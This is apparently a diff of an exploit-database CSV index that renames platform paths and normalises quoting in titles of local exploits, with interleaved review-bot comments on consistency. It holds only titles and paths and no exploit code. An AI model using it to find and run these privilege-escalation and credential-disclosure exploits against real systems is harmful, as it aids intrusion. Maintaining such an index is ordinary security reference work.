20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0
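Review bot: the new line for 20000 drops the space before the variant marker: `Capabilities Privilege Escalation(1)`, whereas the paired entry 20001 on the next line reads `Capabilities Privilege Escalation (2)`. Restore the space so the two variants of the same exploit sort and display consistently.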
@ -7581,8 +7581,8 @@ id,file,description,date,author,platform,type,port
21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0
21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0
21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0
@ -7595,7 +7595,7 @@ id,file,description,date,author,platform,type,port
21565,platforms/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0
21566,platforms/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0
21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local,0
40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
40348,platforms/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0
21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0
@ -7610,7 +7610,7 @@ id,file,description,date,author,platform,type,port
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
@ -7703,7 +7703,7 @@ id,file,description,date,author,platform,type,port
22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
@ -7856,8 +7856,8 @@ id,file,description,date,author,platform,type,port
23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0
23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
@ -7901,7 +7901,7 @@ id,file,description,date,author,platform,type,port
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
24555,platforms/lin_x86-64/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local,0
24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
@ -7935,7 +7935,7 @@ id,file,description,date,author,platform,type,port
25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0
25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local,0
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
@ -7973,7 +7973,7 @@ id,file,description,date,author,platform,type,port
25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",lin_x86-64,local,0
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
@ -8149,14 +8149,14 @@ id,file,description,date,author,platform,type,port
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,linux,local,0
31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
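Review bot: entry 31347 moves to platforms/lin_x86 (platform lin_x86) while 31346, the companion exploit for the same CONFIG_X86_X32 kernel bug on Ubuntu 13.10 by a different author, stays at platforms/linux/local/31346.c with platform linux; if the architecture-specific directory is correct for one it is correct for both, and 31346's description ("'CONFIG_X86_X32' Arbitrary Write Exploit (2)") could use the same "'CONFIG_X86_X32=y' Privilege Escalation" wording as 31347 so the two read as a series.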
@ -8173,7 +8173,7 @@ id,file,description,date,author,platform,type,port
31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0
31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0
31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0
40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
40349,platforms/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0
@ -8199,7 +8199,7 @@ id,file,description,date,author,platform,type,port
32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0
32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
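Review bot: the 32751 description on both the old and the new line reads "Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation", which separates "x64" from "Aware" and leaves "Aware Linux Kernel" without meaning; since this rename is already touching the entry, consider "Systrace 1.x - x64-Aware Linux Kernel Privilege Escalation" (or similar) so the phrase stays intact.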
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0
33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
33213,platforms/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,win_x86,local,0
33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@ -8236,20 +8236,20 @@ id,file,description,date,author,platform,type,port
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
@ -8298,7 +8298,7 @@ id,file,description,date,author,platform,type,port
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
@ -8389,7 +8389,7 @@ id,file,description,date,author,platform,type,port
36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0
37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0
@ -8428,8 +8428,8 @@ id,file,description,date,author,platform,type,port
37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0
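Review bot: 37732's description "Microsoft Windows XP SP3 x86 / 2003 SP2 (x86)" states the architecture twice in two styles; as this hunk is normalising architecture placement for 37722 and 37724, a single trailing "(x86)" as in 37724's "Linux (x86)" would keep the three lines consistent.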
@ -8519,7 +8519,7 @@ id,file,description,date,author,platform,type,port
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation",2015-12-01,rebel,linux,local,0
38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0
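Review bot: 38832 gains quotes around 'abrt/sosreport' but the adjacent 38835 ("Centos 7.1 / Fedora 22 - abrt Privilege Escalation", same author, same date) keeps the bare abrt; apply the quoting convention to both entries in the same change rather than leaving the pair half-converted.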
@ -8549,7 +8549,7 @@ id,file,description,date,author,platform,type,port
40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
